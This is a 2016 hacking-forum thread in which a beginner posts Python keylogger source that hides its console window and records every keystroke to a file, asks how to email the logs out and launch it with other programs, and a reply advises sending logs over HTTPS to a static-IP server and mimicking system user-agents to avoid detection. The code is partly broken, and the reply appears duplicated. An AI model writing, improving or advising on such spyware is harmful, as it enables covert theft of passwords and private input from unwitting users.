Suggestions for my keylogger

A safe place for newbies. You won't get flamed here, as long as you've put in some effort before posting (i.e: Google)...
Post Reply
JJspace12
n00b
Posts: 2
Joined: Thu Mar 31, 2016 6:08 pm

Suggestions for my keylogger

Post by JJspace12 » Thu Mar 31, 2016 6:16 pm

import pyHook, pythoncom, sys, logging
import win32console, win32api, win32gui
import stmplib

textfile_log = 'C:/users/Jaden/desktop/test.txt'

file_log1 = 'C/users/logger.txt'
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

LOG_SENDMAIL = True
LOG_MAIL


If you have suggestions or ideas please tell me i would like to know. Also I would like to know how to implement something so it sends me an email of the txtlog and how to start and stop it when a certain application starts or closes.

def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')

print "You pressed: ", chr(event.Ascii)

logging.log(10,chr(event.Ascii))

return True


hooks_manager = pyHook.HookManagerhooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

JJspace12
n00b
Posts: 2
Joined: Thu Mar 31, 2016 6:08 pm

Help to improve my keylogger

Post by JJspace12 » Fri Apr 01, 2016 12:49 am

If any could tell me how to make this launch and close when a .exe is launched or closed. Also how to attach an Email function to send the .txt file to me

import pyHook, pythoncom, sys, logging
import win32console, win32api, win32gui
import stmplib

textfile_log = 'C:/users/Jaden/Desktop/test.txt'

file_log1 = 'C/users/Jaden/Desktop/logger.txt'
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):

logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')

print "You pressed: ", chr(event.Ascii)

logging.log(10,chr(event.Ascii))

return True


hooks_manager = pyHook.HookManagerhooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()

pythoncom.PumpMessages()
Last edited by JJspace12 on Sun Apr 03, 2016 11:34 am, edited 3 times in total.

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Suggestions for my keylogger

Post by Cool_Fire » Sun Apr 03, 2016 3:23 am

It looks like both "textfile_log" and "file_log1" are never used anywhere? Either way my first suggestion would be to use some windows environment variable in the path so you can be relatively sure it'll actually exist and be writable. Maybe something like TEMP, USERPROFILE or LOCALAPPDATA would be a sensible choice.

If you want to remain undetected on the system it might also make sense to post your logs over https rather then sending them out via email. Odd https traffic is usually pretty hard to spot. If you have some server with a static IP address to post to, you can even avoid having to do a DNS lookup.

You can do a lot more stuff like looking for a user-agent string that the system actually uses. Using a public service that doesn't seem suspicious etc. But this is usually only a benefit when there's active network inspection going on.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Suggestions for my keylogger

Post by Cool_Fire » Sun Apr 03, 2016 3:23 am

It looks like both "textfile_log" and "file_log1" are never used anywhere? Either way my first suggestion would be to use some windows environment variable in the path so you can be relatively sure it'll actually exist and be writable. Maybe something like TEMP, USERPROFILE or LOCALAPPDATA would be a sensible choice.

If you want to remain undetected on the system it might also make sense to post your logs over https rather then sending them out via email. Odd https traffic is usually pretty hard to spot. If you have some server with a static IP address to post to, you can even avoid having to do a DNS lookup.

You can do a lot more stuff like looking for a user-agent string that the system actually uses. Using a public service that doesn't seem suspicious etc. But this is usually only a benefit when there's active network inspection going on.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Post Reply